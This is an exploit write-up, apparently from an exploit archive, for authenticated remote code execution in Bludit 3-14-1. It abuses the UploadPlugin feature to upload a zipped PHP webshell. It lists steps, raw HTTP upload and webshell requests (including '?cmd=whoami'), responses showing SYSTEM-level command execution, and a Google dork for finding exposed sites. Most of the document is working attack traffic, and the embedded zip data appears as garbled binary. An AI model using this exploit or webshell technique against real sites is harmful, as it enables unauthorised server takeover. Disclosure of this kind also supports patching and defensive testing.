# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version : 3-14-1
# Tested on: windows 11 wampserver | Kali linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
# Step 1 : Archive as a zip your webshell (example: payload.zip)
# Step 2 : Login admin account and download 'UploadPlugin'
# Step 3 : Go to UploadPlugin section
# Step 4 : Upload your zip
# Step 5 : target/bl-plugins/[your_payload]
#
######## Proof of Concept ########
==============> START REQUEST <========================================
POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"
b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"
plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip
PK���� 唀圲 � a/PK���� � 攆圲 )�
a/a.php鞻蹘0�}+L�a B垤V軚p��乆J @V旰!祪硪r鹷l7$mQy鄳<$╃烫93愀萞兯凤栿=/�.爌葶Z+M5/暥B稳0>㎝哰j艂覤,匁�tO踏覝.
4�;�拞e)▋�既讛9[Z鹌 剬&耫�<骮+��淣棐y剂
RL蒃(7鈣怿嘷�ユ3O喝�'x>A��p俻鈔零る雷e&滭�恔$豭必F呩@�\�@猤xD⑻'�濁翩Q?絭鯣7��鵝g轳聃
�j眜
\鮿眴/锞无��醋�T橦腪u�j��Hk獕龋g�雅,C脐R��V�j5y%}q�机瓌(嶲K*"诛。;椧�卜6z瞆焔X�黍砟'嶉+裉�%
礿,袖郚谤f,_8棑嫊[硺lO�ScsmI珖�H化*Sc?i)i勾&x@�.'�<棨坨]zs^�a)�hBz0;f r靿0y誙"照I I豛搕�{c髜J�*洳 主悮;d脸�赓lh喕s�% 8N+珆+幁a簉灍煘侣j.
顅�WS睞縊?nH丱?沯濷 悿茫Q+殳骓^
e8�*跃"@2+肼`嶗
k��C57j�'�"m
惝ho� x燈 ;�挏�c鐉貿
穂k艨莜-2靱�撴v━C�顟T#k2,U豐�帵�瓉O�罶Xg槀鶮 啙Q堒 �I喜蛑`:%F$��A"t;buOMr4�蓁~��e�阄�欏豖砬m�(s 6A3,l>�簠<Nq{s __~t聧6峋,吪桤O辞谱�脖�b脩趻慤g[;�p�q�沞榆咆�镴
藑濌v䟞# 奜祍萇�b�h憋盁d椝吂>yMr鲡罶z鲦趺茺)}筻e�簈QRrf}觋_��D 0靧掯v'?@ �犒O鎕'極8f�梺D5[嗖=b�~�PK��?��� 唀圲 � $ �鞟 a/
� � 䴕,
� 䴕,
�j.
�PK��?��� � 攆圲 )�
$ a/a.php
� � -
� 鳚C-
� b�j.
�PK�� � � �
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"
Upload
-----------------------------308003478615795926433430552264--
==============> END REQUEST <========================================
## WEB SHELL UPLOADED!
==============> START RESPONSE <========================================
HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.
==============> END RESPONSE <========================================
# REQUEST THE WEB SHELL
==============> START REQUEST <========================================
GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
==============> END REQUEST <========================================
==============> START RESPONSE <========================================
HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32
<pre>nt authority\system
</pre>
==============> END RESPONSE <========================================
